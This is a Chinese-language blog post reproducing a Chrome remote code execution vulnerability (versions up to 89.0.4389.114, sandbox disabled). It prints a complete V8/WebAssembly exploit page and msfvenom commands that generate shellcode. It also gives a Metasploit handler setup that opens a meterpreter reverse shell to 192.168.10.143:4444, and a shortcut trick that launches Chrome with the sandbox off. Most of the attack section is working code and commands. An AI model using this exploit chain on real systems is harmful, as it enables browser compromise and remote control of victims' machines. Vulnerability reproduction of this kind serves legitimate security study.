Chrome远程代码执行

最新推荐文章于 2022-12-13 22:21:18 发布
最新推荐文章于 2022-12-13 22:21:18 发布
阅读量392 收藏
点赞数
分类专栏: 漏洞复现 文章标签: chrome
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44533592/article/details/115746948
版权

Chrome远程代码执行复现

漏洞简介

Google Chrome 远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,可通过精心构造恶意页面,诱导受害者访问,实现对浏览器的远程代码执行攻击 , 但攻击者单独利用该漏洞无法实现沙盒(SandBox)逃逸。沙盒是 Google Chrome 浏览器的安全边界,防止恶意攻击代码破坏用户系统或者浏览器其他页面。

Google Chrome 浏览器默认开启沙盒保护模式。

影响范围

Google Chrome < = 89.0.4389.114

使用Chrome内核的其他浏览器。

利用条件

关闭沙箱模式 -no-sandbox

漏洞复现

首先我们生成shellcode

msfvenom -a x64 -p windows/x64/exec CMD="msg.exe administrator hi" EXITFUNC=thread -f num

使用msg给发送消息
在这里插入图片描述

修改poc,在shellcode区域写入自己生成的shellcode


<script>
    function gc() {
        for (var i = 0; i < 0x80000; ++i) {
            var a = new ArrayBuffer();
        }
    }
    let shellcode = [shellcode 区域];
    var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
    var wasmModule = new WebAssembly.Module(wasmCode);
    var wasmInstance = new WebAssembly.Instance(wasmModule);
    var main = wasmInstance.exports.main;
    var bf = new ArrayBuffer(8);
    var bfView = new DataView(bf);
    function fLow(f) {
        bfView.setFloat64(0, f, true);
        return (bfView.getUint32(0, true));
    }
    function fHi(f) {
        bfView.setFloat64(0, f, true);
        return (bfView.getUint32(4, true))
    }
    function i2f(low, hi) {
        bfView.setUint32(0, low, true);
        bfView.setUint32(4, hi, true);
        return bfView.getFloat64(0, true);
    }
    function f2big(f) {
        bfView.setFloat64(0, f, true);
        return bfView.getBigUint64(0, true);
    }
    function big2f(b) {
        bfView.setBigUint64(0, b, true);
        return bfView.getFloat64(0, true);
    }
    class LeakArrayBuffer extends ArrayBuffer {
        constructor(size) {
            super(size);
            this.slot = 0xb33f;
        }
    }
    function foo(a) {
        let x = -1;
        if (a) x = 0xFFFFFFFF;
        var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
        arr.shift();
        let local_arr = Array(2);
        local_arr[0] = 5.1;//4014666666666666
        let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
        arr[0] = 0x1122;
        return [arr, local_arr, buff];
    }
    for (var i = 0; i < 0x10000; ++i)
        foo(false);
    gc(); gc();
    [corrput_arr, rwarr, corrupt_buff] = foo(true);
    corrput_arr[12] = 0x22444;
    delete corrput_arr;
    function setbackingStore(hi, low) {
        rwarr[4] = i2f(fLow(rwarr[4]), hi);
        rwarr[5] = i2f(low, fHi(rwarr[5]));
    }
    function leakObjLow(o) {
        corrupt_buff.slot = o;
        return (fLow(rwarr[9]) - 1);
    }
    let corrupt_view = new DataView(corrupt_buff);
    let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
    let idx0Addr = corrupt_buffer_ptr_low - 0x10;
    let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
    let delta = baseAddr + 0x1c - idx0Addr;
    if ((delta % 8) == 0) {
        let baseIdx = delta / 8;
        this.base = fLow(rwarr[baseIdx]);
    } else {
        let baseIdx = ((delta - (delta % 8)) / 8);
        this.base = fHi(rwarr[baseIdx]);
    }
    let wasmInsAddr = leakObjLow(wasmInstance);
    setbackingStore(wasmInsAddr, this.base);
    let code_entry = corrupt_view.getFloat64(13 * 8, true);
    setbackingStore(fLow(code_entry), fHi(code_entry));
    for (let i = 0; i < shellcode.length; i++) {
        corrupt_view.setUint8(i, shellcode[i]);
    }
    main();
</script>

保存为 shell.html 文件
在这里插入图片描述

使用 关闭沙箱启动 chrome
在这里插入图片描述

打开 我们的shell.html文件

在这里插入图片描述

我们已经成功的执行 msg 命令

我们设置一个快捷方式让它能双击就自启动

我们编辑快捷方式, 在目标位置写入如下

在这里插入图片描述

C:\Users\Administrator\AppData\Local\Google\Chrome\Application\chrome.exe -no-sandbox file:///C:/Users/Administrator/Desktop/shell.html

这样双击打开 shell.html文件的时候 就自动的关闭沙箱启动

直接打开即可弹出消息

在这里插入图片描述

接下来我们使用shellcode 上线msf

生成反弹shell的shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.143 lport=4444 -f csharp -o payload.txt

在这里插入图片描述

修改shell.html的shellcode部分

在这里插入图片描述

msf开启监听

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.143
msf6 exploit(multi/handler) > run

在这里插入图片描述

关闭沙箱打开,我们的 shell.html

在这里插入图片描述

在这里插入图片描述

我们已经成功拿到了主机的一个meterpreter会话

在这里插入图片描述

因果yinguo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现】最新Chrome远程代码执行0Day
爱国小白帽
04-13 1906
** ** 该漏洞已验证,目前Google只针对该漏洞发布了beta测试版Chrome(90.0.4430.70)修复,Chrome( 89.0.4389.114)及以下正式版仍存在该漏洞。 利用条件: 此漏洞无法逃逸沙箱,需关闭沙箱环境才能触发,命令如下: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -no-sandbox 修复: 修复方法很简单,因为沙箱环境是默认开启的,所以你只要没关过就不用管 但还是要注意,网上的h.
Chrome爆高危远程代码执行漏洞,赶紧更新!
blackorbird的博客
03-07 393
漏洞出现问题的地方在于一个APIFileReader是一个标准的API,旨在允许web应用程序异步读取存储在用户计算机上文件(或原始数据缓冲区)的内容,通过‘Fi...
Chrome 远程代码执行0Day 简单复现
feng的博客
04-13 779
前言 今天学长告诉我谷歌最新版出了个远程代码执行0day: 【POC公开】Chrome 远程代码执行0Day漏洞通告 反正闲的没事,也本地实验一下。 复现 看一下推特: 今天中午爆出来的,作者也在github上给出了EXP: chrome-0day 影响版本是Google:Chrome: <=89.0.4389.114,确实到了最新版: 开个虚拟机去虚拟机里复现一波。 要求是谷歌浏览器没有开启SandBox模式,其实大部分谷歌浏览器都是开启的,可能只有少部分给关掉了。 谷歌浏览器这里改一下: 最
Chrome浏览器远程代码执行0Day复现
痴人说梦梦中人
04-13 1337
一、漏洞简介          4月13日,国外安全研究员发布了Chrome 远程代码执行 0Day漏洞的PoC详情。攻击者可利用此漏洞,构造一个恶意的Web页面,用户访问该页面时,会造成远程代码执行。目前Google只针对该漏洞发布了beta测试版Chrome(90.0.4430.70)修复,Chrome正式版( 89.0.4389.114)仍存在该漏洞。由于Chrome浏览器会默认开启沙盒,可以拦截利用该漏洞发起的
Linux 下复现 Google Chrome RCE
zyer
12-13 905
Linux服务器复现google chrome rce
NodeJS远程代码执行
10-21
NodeJS远程代码执行知识点: NodeJS是基于Chrome V8引擎的JavaScript运行环境,它使得开发者可以使用JavaScript编写服务器端的程序。由于其高性能和非阻塞I/O模型,NodeJS被广泛应用于构建大型、高并发的网络应用。...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
unrar库作为第三方依赖项合并到Chrome OS中是合理的,尽管没有显示其用法的代码引用。 在缓解策略方面,有几种可行的选择可供考虑: 完全修复:将 Winrar 更新到 6.23+ 将完全修复该问题。 修补程序
Chrome扩展小程序源代码
08-13
- **事件监听与处理**:JavaScript中的事件驱动编程在Chrome扩展中很常见,通过监听用户的动作或者浏览器的事件,扩展可以响应并执行相应的操作。 - **异步编程**:由于许多Chrome API是异步的,学习如何处理异步...
chrome cef client 可执行文件
11-07
Chrome CEF Client是一款基于Chromium Embedded Framework(CEF)的可执行文件,主要用于开发和测试目的。CEF是一个开源项目,它允许开发者将Chromium浏览器引擎集成到自己的应用程序中,以实现自定义的浏览器功能...
chrome远程调试需要的用户数据
08-13
Chrome远程调试是一项强大的功能,它允许开发者在不同的设备或环境下对网页应用进行实时调试,从而提高开发效率和问题排查能力。这个"chrome远程调试需要的用户数据"压缩包文件,显然是为了帮助用户设置或更新Chrome...
漏洞复现】最新Chrome远程代码执行0 Day
在下小黄的博客
04-13 1949
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: 【复现】最新Chrome远程代码执行 0 Day 往期检索:程序设计学习笔记——目录 创建时间:2021年4月13日 软件: Chrome( 89.0.4389.114)及以下正式版仍存在该漏洞Chrome远程代码执行0 Day漏洞简述: 漏洞简述: 2021年04月13日,360CERT监测发现国外安全研究员发布了Chrome 远程代码执行 0Day的POC详情, 漏洞等级:严重 漏洞评分:9.
研究员发布Google Chrome远程代码执行漏洞POC
blackorbird的博客
04-08 1195
在看github地址前,咱们先来看段视频具体分析Chrome发布计划Chrome有一个相对紧张的发布周期,每隔6周推出一个新的稳定版本,如果有关键问题需要保持稳定的刷新。...
Chrome浏览器代码执行0day漏洞
NicolasZQ的博客
12-14 4437
适用版本: 漏洞危害:远程代码执行 影响版本:Chrome 89.0.4389.114以下(含89.0.4389.114) 测试版本: 86.0.4240.198 教程内容: 一、利用kali生成shellcode代码 比如说我要弹出计算器,那么: 64位操作系统: msfvenom -a x64 -p windows/x64/exec CMD="calc" EXITFUNC=thread -f num 32位操作系统: msfvenom -a x86 -p windows/exec CMD=
CHROME扩展开发之·迁移到 Manifest V3
slongzhang的博客
12-29 3479
迁移到 Manifest V3让你朝着正确的方向前进。发表于 2020 年 11 月 9 日,星期一 •更新于2021 年 8 月 13 日,星期五目录功能概要更新 manifest.json 文件清单版本主机权限内容安全政策动作API统一可通过网络访问的资源代码执行远程托管代码执行任意字符串后台服务人员修改网络请求什么时候可以使用阻塞 webRequest?你如何使用 declarativeNetRequest ?条件权限和 declarativeNetRequest已弃用 API 的日落本指南为开发人员
如何在 Chrome执行 JavaScript 代码
村雨遥
03-01 7949
你虽然知道怎么用 Chrome 上网,但你知道怎么用 Chrome 执行 JavaScript 代码么?
谷歌浏览器Chrome最新命令执行0day复现
Jietewang的博客
04-13 694
目录 1.简介 2.复现过程截图 1.简介 最新护网周期内每个相关人员的弦都是紧绷的,今天偶然获得一个0day随即来复现一下子。也思考了一下该漏洞造成的危害和具体的利用方式,如有奇思妙想欢迎私聊。 2.复现过程截图 使用快捷方式获取到浏览器安装位置,关闭沙箱并运行浏览器。 执行上面的命令后出现的结果 进入下载好的html文件 执行exp 漏洞来源:https://github.com/r4j0x00/exploits/tree/master/chrome-0da...
漏洞复现——Chrome 浏览器的 0day 远程代码执行漏洞 (附poc)
gjgj的博客
04-21 7500
漏洞复现——Chrome 浏览器的 0day 远程代码执行漏洞 一、基本信息 CVE编号:CNVD-2021-27989 危险等级:严重 漏洞类型:远程代码执行漏洞 漏洞影响范围:Google Chrome < = 89.0.4389.114。 利用条件:Chrome: <=89.0.4389.114,开启--no-sandbox 无沙盒模式 二、漏洞描述 攻击者利用此漏洞,构造一个恶意的web页面,用户访问该页面时,会造成远程代码执行。 Chr...
chrome扩展插件开发manifest V3
web_xiaolei的博客
11-18 3484
{ // manifest版本,目前最新的是第3版 "manifest_version": 3, // 扩展插件名称 "name": "My Extension", // 扩展插件的版本后 "version": "versionString", // 第3版之后开始支持,可控制扩展按钮 "action": { "default_icon": { // 默认图标 "16": "images/icon16.png", // optio
Chrome远程控制开发文档
最新发布
04-12
这些文档提供了详细的指南和示例代码,帮助开发者了解和使用Chrome远程控制功能。 Chrome远程控制开发文档主要包括以下几个方面的内容: 1. Chrome DevTools Protocol:这是Chrome浏览器与开发者工具之间的通信...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值